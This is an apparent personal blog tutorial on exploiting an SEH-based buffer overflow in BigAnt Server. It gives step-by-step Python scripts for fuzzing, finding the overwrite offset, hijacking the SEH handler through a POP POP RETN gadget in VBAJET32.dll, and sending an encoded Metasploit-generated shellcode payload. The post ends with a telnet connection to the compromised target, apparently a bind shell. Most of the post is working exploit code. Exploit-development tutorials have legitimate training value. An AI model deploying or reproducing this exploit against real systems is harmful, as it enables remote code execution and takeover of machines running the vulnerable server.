• 0

Buffer Overflow BigAnt Server SEH


This time, I will try to explain how to use the software with SEH protection system called BigAnt Server. SEH exception handler is to protect the EIP to be overflowing with abnormal flow in the software. This forces us to use a different attack vectors and techniques because if we use the same technique as in Back Direct exploitation of the attack will not work because of SEH.


- Create Fuzzer with python 
this is my fuzzer :

#!/usr/bin/python
import socket
address="192.168.56.2"
port=6660
buffer="USV "
buffer+="\x41"*2500
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address,port))
sock.send(buffer)
sock.close()
print ("Done")
- BigAnt server and run OllyDbg, attach to AntServer. and run the fuzzer has been made 
- As you can see above, the EIP isn't overwritten by the fuzzer directly because of the SEH. To view what happen in SEH, click View>SEH chain.
- The SEH handle the excess 'A' character. To transmit the char into the EIP press Shift+F9
- In the bottom right of the OllyDbg windows, we can see that the fuzzer's data sent to the application also entered the stack memory. To see it right click on the stack line then click follow in dump. 

- To pass the SEH protection we must find the POP POP RETN command on one of the modules that loaded by BigAnt. The module must not have SafeSEH ON, and DLLCHARACTERISTICS_NO_SEH in it. Usually, modules that don't have it is a third party module outside Windows. But, in this case BigAnt don't have a modules in its system, so we must use the modules from Windows.


 - We will use VBAJET32.dll located in C:\\Windows\system32 as the door to pass the SEH as the modules is also loaded by BigAnt.

- After that, we must find the POP POP RETN command on this module. Open your module then right click > Search for > Sequence of Commands.
- Enter POP r32, POP r32, and RETN on the search box.
- Here's what we will get. The address of POP POP and RETN on the VBAJET32.dll module.
- Ok, next step we must find the address where the SEH is overwritten. As usual, we will use pattern_create and pattern_offset to do this.
- Make a pattern 2500 bytes long then insert it on the fuzzer.
#!/usr/bin/python
import socket
address="172.16.227.128"
port=6660
buffer="USV "
buffer+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D"
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address,port))
sock.send(buffer)
sock.close()
print ("Done")

- Execute it, then see what happen in OllyDbg. Don't forget to restart both OllyDbg and BigAnt server first.

- Use pattern_offset to get the exact address.
# ./pattern_offset.rb 42326742
966

- lets try to overwrite the SEH with the address of POP POP RETN on the VBAJET32.dll module. Change the script again.

#!/usr/bin/python
import socket
address="172.16.227.128"
port=6660
buffer="USV "
buffer+="\x90"*962
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x41\x41\x41\x41"
buffer+="\x90"*(2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address,port))
sock.send(buffer)
sock.close()
print ("Done")
and now :

Place a breakpoint on the POP POP RETN address on VBAJET32.dll module.
- Now, execute it then see what SEH Chain will display.
- Press Shift+F9 to continue the process to VBAJET32.dll then press it again to continue the POP POP RETN sequence located in the module. After that press F7 until the process reach the RETN command.

- Next, generate the payload using msfweb.

- Why there are 0x20 and 0x25 in the Restricted Characters columns? It is a bad character.
- Generated payload.
- Insert on fuzzer.

#!/usr/bin/python
import socket
address="172.16.227.128"
port=6660
buffer="USV "
buffer+="\x90"*962
buffer+="\xeb\x06\x90\x90"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90"*32
buffer+=("\x33\xc9\xd9\xc2\xbf\x9f\x35\x1b\xc3\xd9\x74\x24\xf4\xb1\x51\x5e"
"\x31\x7e\x15\x03\x7e\x15\x83\x59\x31\xf9\x36\x99\x50\x16\xf5\x89"
"\x5c\x17\xf9\xb6\xff\x63\x6a\x6c\x24\xff\x36\x50\xaf\x83\xbd\xd0"
"\xae\x94\x35\x6f\xa9\xe1\x15\x4f\xc8\x1e\xe0\x04\xfe\x6b\xf2\xf4"
"\xce\xab\x6c\xa4\xb5\xec\xfb\xb3\x74\x26\x0e\xba\xb4\x5c\xe5\x87"
"\x6c\x87\x2e\x82\x69\x4c\x71\x48\x73\xb8\xe8\x1b\x7f\x75\x7e\x44"
"\x9c\x88\x6b\x79\xb0\x01\xe2\x11\xec\x09\x94\x2a\xdd\xea\x32\x27"
"\x5d\x3d\x30\x77\x6e\xb6\x36\x6b\xc3\x43\xf6\x9b\x45\x3c\x79\xd5"
"\x77\x50\xd5\x16\x51\xce\x85\x8e\x36\x3c\x18\x26\xb0\x31\x6e\xe9"
"\x6a\x49\x5e\x7d\x58\x58\xa3\x46\x0e\x5c\x8a\xe7\x27\x47\x55\x96"
"\xd5\x80\x98\xcd\x4f\x93\x63\x3d\xe7\x4a\x92\x48\x55\x3b\x5a\x64"
"\xf5\x97\xf7\xdb\xa9\x54\xab\x98\x1e\xa4\x9b\x78\xc9\x4b\x40\xe2"
"\x5a\xe5\x99\x7f\x34\x51\x43\x0f\x02\xce\x8b\x39\xe6\xe1\x22\x90"
"\x08\xd1\xad\xbe\x5a\xfc\xc4\xe9\x5b\xd7\x44\x40\x5b\x08\x02\x8f"
"\xea\x2f\x9a\x18\x12\xf9\x4d\xf2\xb8\x53\x91\x2a\xd3\x34\x8a\xb3"
"\x12\xbd\x03\xbc\x4d\x6b\x53\x92\x14\xfe\xcf\x74\xb1\x9d\x62\xf1"
"\xa4\x08\x2d\x58\x0e\x01\x44\xbd\x3a\xdd\xde\xa3\x8a\x1d\x13\x89"
"\x13\xdf\xf9\x33\xa9\xcc\x92\x46\x54\x35\x3e\xf3\x02\x2d\x32\xfd"
"\xe6\xb8\x4d\x74\x4d\x3a\x67\x2d\x1a\x96\xd9\x80\xf5\x7c\xdb\x73"
"\xa7\xd5\x8a\x8c\x97\xbe\x81\xab\x1d\xf1\x89\xb4\xc8\x67\xd1\xb5"
"\xc2\x88\xfd\xc2\x7a\x8b\x7d\x10\xe0\x8c\x54\xca\x16\xa2\x31\x94"
"\x30\xa1\xb1\x3b\x3e\xf0\xc9\x6b")
buffer+="\x90"*(2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address,port))
sock.send(buffer)
sock.close()
print ("Done")


- Execute the fuzzer then connect using telnet to the target.






0 komentar:

Posting Komentar

Diberdayakan oleh Blogger.

Copyright © / scxo2oco71

Template by : Urang-kurai / powered by :blogger